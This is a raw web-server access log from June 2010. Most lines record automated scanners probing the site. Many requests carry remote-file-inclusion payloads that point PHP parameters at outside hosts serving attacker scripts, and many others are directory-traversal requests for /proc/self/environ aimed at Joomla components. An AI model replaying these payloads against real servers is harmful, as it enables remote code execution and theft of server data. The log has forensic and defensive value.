209.59.202.38 - - [23/Jun/2010:00:07:59 -0400] "GET /logs/access_log.Q109052200//modules/My_eGallery/public/displayCategory.php?basepath=http://www.lagrassroots.net//concrete/data/usill-id.txt?? HTTP/1.1" 404 272 "-" "Mozilla/5.0 (X11; U; FreeBSD i386; en-US; rv:1.7.8) Gecko/20050609 Firefox/1.0.4"
209.59.202.38 - - [23/Jun/2010:00:07:59 -0400] "GET /logs/error_log.Q109092700//modules/My_eGallery/public/displayCategory.php?basepath=http://www.lagrassroots.net//concrete/data/usill-id.txt?? HTTP/1.1" 404 271 "-" "Mozilla/5.0 (X11; U; FreeBSD i386; en-US; rv:1.7.8) Gecko/20050609 Firefox/1.0.4"
209.59.202.38 - - [23/Jun/2010:00:07:59 -0400] "GET /logs/access_log.Q109072700//modules/My_eGallery/public/displayCategory.php?basepath=http://www.lagrassroots.net//concrete/data/usill-id.txt?? HTTP/1.1" 404 272 "-" "Mozilla/5.0 (X11; U; FreeBSD i386; en-US; rv:1.7.8) Gecko/20050609 Firefox/1.0.4"
209.59.202.38 - - [23/Jun/2010:00:08:01 -0400] "GET /logs/error_log.Q109092700//modules/My_eGallery/public/displayCategory.php?basepath=http://www.lagrassroots.net//concrete/data/usill-id.txt?? HTTP/1.1" 404 271 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8) Gecko/20051107 Firefox/1.5"
209.59.202.38 - - [23/Jun/2010:00:08:01 -0400] "GET /logs/access_log.Q109072700//modules/My_eGallery/public/displayCategory.php?basepath=http://www.lagrassroots.net//concrete/data/usill-id.txt?? HTTP/1.1" 404 272 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8) Gecko/20051107 Firefox/1.5"
209.59.202.38 - - [23/Jun/2010:00:08:04 -0400] "GET /logs/access_log.Q109052200//modules/My_eGallery/public/displayCategory.php?basepath=http://www.lagrassroots.net//concrete/data/usill-id.txt?? HTTP/1.1" 404 272 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8) Gecko/20051107 Firefox/1.5"
174.121.217.109 - - [23/Jun/2010:00:08:15 -0400] "GET /logs/access_log.Q110060700//index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 235 "-" "libwww-perl/5.810"
174.121.217.109 - - [23/Jun/2010:00:08:15 -0400] "GET //index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 208 "-" "libwww-perl/5.810"
174.121.217.109 - - [23/Jun/2010:00:08:16 -0400] "GET /logs//index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 213 "-" "libwww-perl/5.810"
209.59.202.38 - - [23/Jun/2010:00:08:17 -0400] "GET /logs/access_log.Q110021800//modules/My_eGallery/public/displayCategory.php?basepath=http://www.lagrassroots.net//concrete/data/usill-id.txt?? HTTP/1.1" 404 272 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8) Gecko/20051107 Firefox/1.5"
209.59.202.38 - - [23/Jun/2010:00:08:17 -0400] "GET /logs/error_log.Q109090400//modules/My_eGallery/public/displayCategory.php?basepath=http://www.lagrassroots.net//concrete/data/usill-id.txt?? HTTP/1.1" 404 271 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8) Gecko/20051107 Firefox/1.5"
209.59.202.38 - - [23/Jun/2010:00:08:18 -0400] "GET /logs/error_log.Q109090400//modules/My_eGallery/public/displayCategory.php?basepath=http://www.lagrassroots.net//concrete/data/usill-id.txt?? HTTP/1.1" 404 271 "-" "Mozilla/5.0 (X11; U; FreeBSD i386; en-US; rv:1.7.8) Gecko/20050609 Firefox/1.0.4"
209.59.202.38 - - [23/Jun/2010:00:08:18 -0400] "GET /logs/access_log.Q110021800//modules/My_eGallery/public/displayCategory.php?basepath=http://www.lagrassroots.net//concrete/data/usill-id.txt?? HTTP/1.1" 404 272 "-" "Mozilla/5.0 (X11; U; FreeBSD i386; en-US; rv:1.7.8) Gecko/20050609 Firefox/1.0.4"
205.234.231.180 - - [23/Jun/2010:00:08:19 -0400] "GET ///components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 243 "-" "libwww-perl/5.831"
209.59.202.38 - - [23/Jun/2010:00:08:19 -0400] "GET /logs/error_log.Q109052500//modules/My_eGallery/public/displayCategory.php?basepath=http://www.lagrassroots.net//concrete/data/usill-id.txt?? HTTP/1.1" 404 271 "-" "Mozilla/5.0 (X11; U; FreeBSD i386; en-US; rv:1.7.8) Gecko/20050609 Firefox/1.0.4"
209.59.202.38 - - [23/Jun/2010:00:08:24 -0400] "GET /logs/error_log.Q109051100//modules/My_eGallery/public/displayCategory.php?basepath=http://www.lagrassroots.net//concrete/data/usill-id.txt?? HTTP/1.1" 404 271 "-" "Mozilla/5.0 (X11; U; FreeBSD i386; en-US; rv:1.7.8) Gecko/20050609 Firefox/1.0.4"
209.59.202.38 - - [23/Jun/2010:00:08:24 -0400] "GET /logs/error_log.Q109052500//modules/My_eGallery/public/displayCategory.php?basepath=http://www.lagrassroots.net//concrete/data/usill-id.txt?? HTTP/1.1" 404 271 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8) Gecko/20051107 Firefox/1.5"
209.59.202.38 - - [23/Jun/2010:00:08:25 -0400] "GET /logs/error_log.Q109051100//modules/My_eGallery/public/displayCategory.php?basepath=http://www.lagrassroots.net//concrete/data/usill-id.txt?? HTTP/1.1" 404 271 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8) Gecko/20051107 Firefox/1.5"
209.59.202.38 - - [23/Jun/2010:00:08:27 -0400] "GET /logs/access_log.Q110060100//modules/My_eGallery/public/displayCategory.php?basepath=http://www.lagrassroots.net//concrete/data/usill-id.txt?? HTTP/1.1" 404 272 "-" "Mozilla/5.0 (X11; U; FreeBSD i386; en-US; rv:1.7.8) Gecko/20050609 Firefox/1.0.4"
209.59.202.38 - - [23/Jun/2010:00:08:27 -0400] "GET /logs/error_log.Q109072700//modules/My_eGallery/public/displayCategory.php?basepath=http://www.lagrassroots.net//concrete/data/usill-id.txt?? HTTP/1.1" 404 271 "-" "Mozilla/5.0 (X11; U; FreeBSD i386; en-US; rv:1.7.8) Gecko/20050609 Firefox/1.0.4"
209.59.202.38 - - [23/Jun/2010:00:08:27 -0400] "GET /logs/access_log.Q110011300//modules/My_eGallery/public/displayCategory.php?basepath=http://www.lagrassroots.net//concrete/data/usill-id.txt?? HTTP/1.1" 404 272 "-" "Mozilla/5.0 (X11; U; FreeBSD i386; en-US; rv:1.7.8) Gecko/20050609 Firefox/1.0.4"
209.59.202.38 - - [23/Jun/2010:00:08:28 -0400] "GET /logs/error_log.Q109072700//modules/My_eGallery/public/displayCategory.php?basepath=http://www.lagrassroots.net//concrete/data/usill-id.txt?? HTTP/1.1" 404 271 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8) Gecko/20051107 Firefox/1.5"
209.59.202.38 - - [23/Jun/2010:00:08:28 -0400] "GET /logs/access_log.Q110060100//modules/My_eGallery/public/displayCategory.php?basepath=http://www.lagrassroots.net//concrete/data/usill-id.txt?? HTTP/1.1" 404 272 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8) Gecko/20051107 Firefox/1.5"
209.59.202.38 - - [23/Jun/2010:00:08:31 -0400] "GET /logs/access_log.Q110011300//modules/My_eGallery/public/displayCategory.php?basepath=http://www.lagrassroots.net//concrete/data/usill-id.txt?? HTTP/1.1" 404 272 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8) Gecko/20051107 Firefox/1.5"
94.247.178.153 - - [23/Jun/2010:00:08:40 -0400] "GET /index.php?option=com_rwcards&view=rwcards&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 207 "-" "libwww-perl/5.805"
209.59.202.38 - - [23/Jun/2010:00:09:01 -0400] "GET /logs/error_log.Q110021800//modules/My_eGallery/public/displayCategory.php?basepath=http://www.lagrassroots.net//concrete/data/usill-id.txt?? HTTP/1.1" 404 271 "-" "Mozilla/5.0 (X11; U; FreeBSD i386; en-US; rv:1.7.8) Gecko/20050609 Firefox/1.0.4"
209.59.202.38 - - [23/Jun/2010:00:09:01 -0400] "GET /logs/access_log.Q109050700//modules/My_eGallery/public/displayCategory.php?basepath=http://www.lagrassroots.net//concrete/data/usill-id.txt?? HTTP/1.1" 404 272 "-" "Mozilla/5.0 (X11; U; FreeBSD i386; en-US; rv:1.7.8) Gecko/20050609 Firefox/1.0.4"
209.59.202.38 - - [23/Jun/2010:00:09:04 -0400] "GET /logs/error_log.Q110021800//modules/My_eGallery/public/displayCategory.php?basepath=http://www.lagrassroots.net//concrete/data/usill-id.txt?? HTTP/1.1" 404 271 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8) Gecko/20051107 Firefox/1.5"
209.59.202.38 - - [23/Jun/2010:00:09:04 -0400] "GET /logs/access_log.Q109050700//modules/My_eGallery/public/displayCategory.php?basepath=http://www.lagrassroots.net//concrete/data/usill-id.txt?? HTTP/1.1" 404 272 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8) Gecko/20051107 Firefox/1.5"
174.121.216.99 - - [23/Jun/2010:00:09:08 -0400] "GET ///components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 243 "-" "libwww-perl/5.810"
174.121.216.99 - - [23/Jun/2010:00:09:08 -0400] "GET ///components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 243 "-" "libwww-perl/5.810"
209.59.202.38 - - [23/Jun/2010:00:09:11 -0400] "GET /logs/access_log.Q109071400//modules/My_eGallery/public/displayCategory.php?basepath=http://www.lagrassroots.net//concrete/data/usill-id.txt?? HTTP/1.1" 404 272 "-" "Mozilla/5.0 (X11; U; FreeBSD i386; en-US; rv:1.7.8) Gecko/20050609 Firefox/1.0.4"
174.121.216.99 - - [23/Jun/2010:00:09:15 -0400] "GET ///components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 243 "-" "libwww-perl/5.810"
209.59.202.38 - - [23/Jun/2010:00:09:16 -0400] "GET /logs/access_log.Q109071400//modules/My_eGallery/public/displayCategory.php?basepath=http://www.lagrassroots.net//concrete/data/usill-id.txt?? HTTP/1.1" 404 272 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8) Gecko/20051107 Firefox/1.5"
95.108.245.251 - - [23/Jun/2010:00:09:32 -0400] "GET /logs/error_log.Q110051400 HTTP/1.1" 304 - "-" "Yandex/1.01.001 (compatible; Win16; I)"
209.59.202.38 - - [23/Jun/2010:00:09:33 -0400] "GET /logs/error_log.Q110060100//modules/My_eGallery/public/displayCategory.php?basepath=http://www.lagrassroots.net//concrete/data/usill-id.txt?? HTTP/1.1" 404 271 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8) Gecko/20051107 Firefox/1.5"
94.247.178.153 - - [23/Jun/2010:00:09:34 -0400] "GET /logs/access_log.Q110052400/index.php?option=com_rwcards&view=rwcards&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 234 "-" "libwww-perl/5.805"
94.247.178.153 - - [23/Jun/2010:00:09:34 -0400] "GET /index.php?option=com_rwcards&view=rwcards&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 207 "-" "libwww-perl/5.805"
94.247.178.153 - - [23/Jun/2010:00:09:35 -0400] "GET /logs/index.php?option=com_rwcards&view=rwcards&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 212 "-" "libwww-perl/5.805"
209.59.202.38 - - [23/Jun/2010:00:09:35 -0400] "GET /logs/access_log.Q109092700//modules/My_eGallery/public/displayCategory.php?basepath=http://www.lagrassroots.net//concrete/data/usill-id.txt?? HTTP/1.1" 404 272 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8) Gecko/20051107 Firefox/1.5"
209.59.202.38 - - [23/Jun/2010:00:09:35 -0400] "GET /logs/error_log.Q109071400//modules/My_eGallery/public/displayCategory.php?basepath=http://www.lagrassroots.net//concrete/data/usill-id.txt?? HTTP/1.1" 404 271 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8) Gecko/20051107 Firefox/1.5"
209.59.202.38 - - [23/Jun/2010:00:09:39 -0400] "GET /logs/error_log.Q110060100//modules/My_eGallery/public/displayCategory.php?basepath=http://www.lagrassroots.net//concrete/data/usill-id.txt?? HTTP/1.1" 404 271 "-" "Mozilla/5.0 (X11; U; FreeBSD i386; en-US; rv:1.7.8) Gecko/20050609 Firefox/1.0.4"
209.59.202.38 - - [23/Jun/2010:00:09:39 -0400] "GET /logs/access_log.Q109092700//modules/My_eGallery/public/displayCategory.php?basepath=http://www.lagrassroots.net//concrete/data/usill-id.txt?? HTTP/1.1" 404 272 "-" "Mozilla/5.0 (X11; U; FreeBSD i386; en-US; rv:1.7.8) Gecko/20050609 Firefox/1.0.4"
209.59.202.38 - - [23/Jun/2010:00:09:39 -0400] "GET /logs/error_log.Q109071400//modules/My_eGallery/public/displayCategory.php?basepath=http://www.lagrassroots.net//concrete/data/usill-id.txt?? HTTP/1.1" 404 271 "-" "Mozilla/5.0 (X11; U; FreeBSD i386; en-US; rv:1.7.8) Gecko/20050609 Firefox/1.0.4"
209.59.202.38 - - [23/Jun/2010:00:09:42 -0400] "GET /logs/access_log.Q110032600//modules/My_eGallery/public/displayCategory.php?basepath=http://www.lagrassroots.net//concrete/data/usill-id.txt?? HTTP/1.1" 404 272 "-" "Mozilla/5.0 (X11; U; FreeBSD i386; en-US; rv:1.7.8) Gecko/20050609 Firefox/1.0.4"
67.195.114.223 - - [23/Jun/2010:00:09:33 -0400] "GET /logs/access_log.Q109121500 HTTP/1.0" 200 5292545 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
94.247.178.153 - - [23/Jun/2010:00:10:24 -0400] "GET /logs/error_log.Q110061400/index.php?option=com_rwcards&view=rwcards&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 233 "-" "libwww-perl/5.805"
94.247.178.153 - - [23/Jun/2010:00:10:24 -0400] "GET /index.php?option=com_rwcards&view=rwcards&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 207 "-" "libwww-perl/5.805"
94.247.178.153 - - [23/Jun/2010:00:10:25 -0400] "GET /logs/index.php?option=com_rwcards&view=rwcards&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 212 "-" "libwww-perl/5.805"
94.247.178.153 - - [23/Jun/2010:00:11:10 -0400] "GET /logs/access_log.Q110050800/index.php?option=com_rwcards&view=rwcards&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 234 "-" "libwww-perl/5.805"
174.121.216.99 - - [23/Jun/2010:00:11:13 -0400] "GET /logs/error_log.Q110061700//index.php?option=com_sectionex&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 234 "-" "libwww-perl/5.810"
174.121.216.99 - - [23/Jun/2010:00:11:13 -0400] "GET //index.php?option=com_sectionex&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 208 "-" "libwww-perl/5.810"
174.121.216.99 - - [23/Jun/2010:00:11:13 -0400] "GET /logs//index.php?option=com_sectionex&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 213 "-" "libwww-perl/5.810"
174.121.216.99 - - [23/Jun/2010:00:11:22 -0400] "GET /logs/access_log.Q110042700//index.php?option=com_sectionex&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 235 "-" "libwww-perl/5.810"
218.149.84.111 - - [23/Jun/2010:00:11:39 -0400] "GET /?pag=http://www.cricermenate.it/idd.txt?? HTTP/1.1" 200 409 "-" "libwww-perl/5.805"
74.208.149.56 - - [23/Jun/2010:00:11:46 -0400] "GET /logs/error_log.Q109081300/technote7/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.cantinalatina.nl/1.txt? HTTP/1.1" 404 288 "-" "Mozilla/5.0"
74.208.149.56 - - [23/Jun/2010:00:11:55 -0400] "GET /logs/error_log.Q109070300/technote7/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.cantinalatina.nl/1.txt? HTTP/1.1" 404 288 "-" "Mozilla/5.0"
209.59.12.99 - - [23/Jun/2010:00:12:01 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
174.121.216.99 - - [23/Jun/2010:00:14:00 -0400] "GET /logs/error_log.Q110061700//index.php?option=com_sectionex&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 234 "-" "libwww-perl/5.810"
174.121.216.99 - - [23/Jun/2010:00:14:00 -0400] "GET //index.php?option=com_sectionex&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 208 "-" "libwww-perl/5.810"
174.121.216.99 - - [23/Jun/2010:00:14:00 -0400] "GET /logs//index.php?option=com_sectionex&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 213 "-" "libwww-perl/5.810"
174.121.216.99 - - [23/Jun/2010:00:14:10 -0400] "GET /logs/access_log.Q110042700//index.php?option=com_sectionex&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 235 "-" "libwww-perl/5.810"
205.234.231.180 - - [23/Jun/2010:00:14:12 -0400] "GET /logs/error_log.Q110061700//index.php?option=com_sectionex&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 234 "-" "libwww-perl/5.831"
205.234.231.180 - - [23/Jun/2010:00:14:12 -0400] "GET //index.php?option=com_sectionex&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 208 "-" "libwww-perl/5.831"
205.234.231.180 - - [23/Jun/2010:00:14:12 -0400] "GET /logs//index.php?option=com_sectionex&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 213 "-" "libwww-perl/5.831"
174.121.216.99 - - [23/Jun/2010:00:14:15 -0400] "GET /logs/error_log.Q110061700//index.php?option=com_sectionex&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 234 "-" "libwww-perl/5.810"
174.121.216.99 - - [23/Jun/2010:00:14:15 -0400] "GET //index.php?option=com_sectionex&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 208 "-" "libwww-perl/5.810"
174.121.216.99 - - [23/Jun/2010:00:14:16 -0400] "GET /logs//index.php?option=com_sectionex&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 213 "-" "libwww-perl/5.810"
62.44.82.118 - - [23/Jun/2010:00:14:16 -0400] "GET /?option=com_awiki&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 409 "-" "libwww-perl/5.803"
66.249.71.206 - - [23/Jun/2010:00:14:18 -0400] "GET /CGI-BIN/LANSAWEB?WEBEVENT+LC216E65E2D29280053D605G+M37+ENG HTTP/1.1" 500 197 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
205.234.231.180 - - [23/Jun/2010:00:14:19 -0400] "GET /logs/access_log.Q110042700//index.php?option=com_sectionex&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 235 "-" "libwww-perl/5.831"
174.121.216.99 - - [23/Jun/2010:00:14:24 -0400] "GET /logs/access_log.Q110042700//index.php?option=com_sectionex&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 235 "-" "libwww-perl/5.810"
68.109.233.150 - - [23/Jun/2010:00:15:09 -0400] "GET //index.php?option=com_sectionex&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 208 "-" "libwww-perl/5.79"
94.247.178.153 - - [23/Jun/2010:00:15:09 -0400] "GET /?option=com_awiki&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 409 "-" "libwww-perl/5.805"
66.249.71.73 - - [23/Jun/2010:00:15:31 -0400] "GET /CGI-BIN/LANSAWEB?WEBEVENT+LM238CA6F0FA47500CEAC081+M37+ENG HTTP/1.1" 500 197 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.71.245.122 - - [23/Jun/2010:00:15:46 -0400] "GET ////?_SERVER[DOCUMENT_ROOT]=http://www.sinhhocvietnam.com/data/1???? HTTP/1.1" 200 454 "-" "Mozilla/5.0"
66.71.245.122 - - [23/Jun/2010:00:15:46 -0400] "GET /logs/access_log.Q109102200////?_SERVER[DOCUMENT_ROOT]=http://www.sinhhocvietnam.com/data/1???? HTTP/1.1" 404 228 "-" "Mozilla/5.0"
66.71.245.122 - - [23/Jun/2010:00:15:47 -0400] "GET /logs////?_SERVER[DOCUMENT_ROOT]=http://www.sinhhocvietnam.com/data/1???? HTTP/1.1" 200 55561 "-" "Mozilla/5.0"
149.31.6.24 - - [23/Jun/2010:00:15:51 -0400] "GET /logs/access_log.Q109102200////?_SERVER[DOCUMENT_ROOT]=http://www.sinhhocvietnam.com/data/1???? HTTP/1.1" 404 228 "-" "Mozilla/5.0"
149.31.6.24 - - [23/Jun/2010:00:15:51 -0400] "GET ////?_SERVER[DOCUMENT_ROOT]=http://www.sinhhocvietnam.com/data/1???? HTTP/1.1" 200 454 "-" "Mozilla/5.0"
149.31.6.24 - - [23/Jun/2010:00:15:51 -0400] "GET /logs////?_SERVER[DOCUMENT_ROOT]=http://www.sinhhocvietnam.com/data/1???? HTTP/1.1" 200 55561 "-" "Mozilla/5.0"
149.31.6.24 - - [23/Jun/2010:00:16:00 -0400] "GET /logs/access_log.Q109102300////?_SERVER[DOCUMENT_ROOT]=http://www.sinhhocvietnam.com/data/1???? HTTP/1.1" 404 228 "-" "Mozilla/5.0"
66.71.245.122 - - [23/Jun/2010:00:16:01 -0400] "GET /logs/access_log.Q109102300////?_SERVER[DOCUMENT_ROOT]=http://www.sinhhocvietnam.com/data/1???? HTTP/1.1" 404 228 "-" "Mozilla/5.0"
95.108.245.251 - - [23/Jun/2010:00:17:23 -0400] "GET /images/ACE_BoneGraft_04.pdf HTTP/1.1" 304 - "-" "Yandex/1.01.001 (compatible; Win16; I)"
174.121.216.99 - - [23/Jun/2010:00:17:24 -0400] "GET //index.php?option=com_sectionex&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 208 "-" "libwww-perl/5.810"
94.198.96.3 - - [23/Jun/2010:00:17:59 -0400] "GET /logs/access_log.Q109100900/index.php?pg=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 234 "-" "libwww-perl/5.816"
94.198.96.3 - - [23/Jun/2010:00:18:00 -0400] "GET /index.php?pg=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 207 "-" "libwww-perl/5.816"
94.198.96.3 - - [23/Jun/2010:00:18:01 -0400] "GET /logs/index.php?pg=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 212 "-" "libwww-perl/5.816"
149.31.6.24 - - [23/Jun/2010:00:18:22 -0400] "GET /logs/access_log.Q109102200%20%20////?_SERVER[DOCUMENT_ROOT]=http://www.sinhhocvietnam.com/data/1???? HTTP/1.1" 404 230 "-" "Mozilla/5.0"
217.31.58.188 - - [23/Jun/2010:00:18:26 -0400] "GET /logs//skins/advanced/advanced1.php?pluginpath[0]=http://www.cristianisimo.com//myid.jpg??myid.jpg? HTTP/1.1" 404 232 "-" "libwww-perl/5.805"
217.31.58.188 - - [23/Jun/2010:00:18:27 -0400] "GET //skins/advanced/advanced1.php?pluginpath[0]=http://www.cristianisimo.com//myid.jpg??myid.jpg? HTTP/1.1" 404 227 "-" "libwww-perl/5.805"
149.31.6.24 - - [23/Jun/2010:00:18:32 -0400] "GET /logs/access_log.Q109102300%20%20////?_SERVER[DOCUMENT_ROOT]=http://www.sinhhocvietnam.com/data/1???? HTTP/1.1" 404 230 "-" "Mozilla/5.0"
94.198.96.3 - - [23/Jun/2010:00:18:41 -0400] "GET /logs//skins/advanced/advanced1.php?pluginpath[0]=http://www.cristianisimo.com//myid.jpg??myid.jpg? HTTP/1.1" 404 232 "-" "libwww-perl/5.816"
94.198.96.3 - - [23/Jun/2010:00:18:42 -0400] "GET //skins/advanced/advanced1.php?pluginpath[0]=http://www.cristianisimo.com//myid.jpg??myid.jpg? HTTP/1.1" 404 227 "-" "libwww-perl/5.816"
66.71.245.122 - - [23/Jun/2010:00:18:45 -0400] "GET /logs/access_log.Q109102200%20%20////?_SERVER[DOCUMENT_ROOT]=http://www.sinhhocvietnam.com/data/1???? HTTP/1.1" 404 230 "-" "Mozilla/5.0"
66.71.245.122 - - [23/Jun/2010:00:18:51 -0400] "GET /logs/access_log.Q109102300%20%20////?_SERVER[DOCUMENT_ROOT]=http://www.sinhhocvietnam.com/data/1???? HTTP/1.1" 404 230 "-" "Mozilla/5.0"
205.234.231.180 - - [23/Jun/2010:00:18:55 -0400] "GET /logs/error_log.Q110030800///components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 269 "-" "libwww-perl/5.831"
205.234.231.180 - - [23/Jun/2010:00:18:55 -0400] "GET ///components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 243 "-" "libwww-perl/5.831"
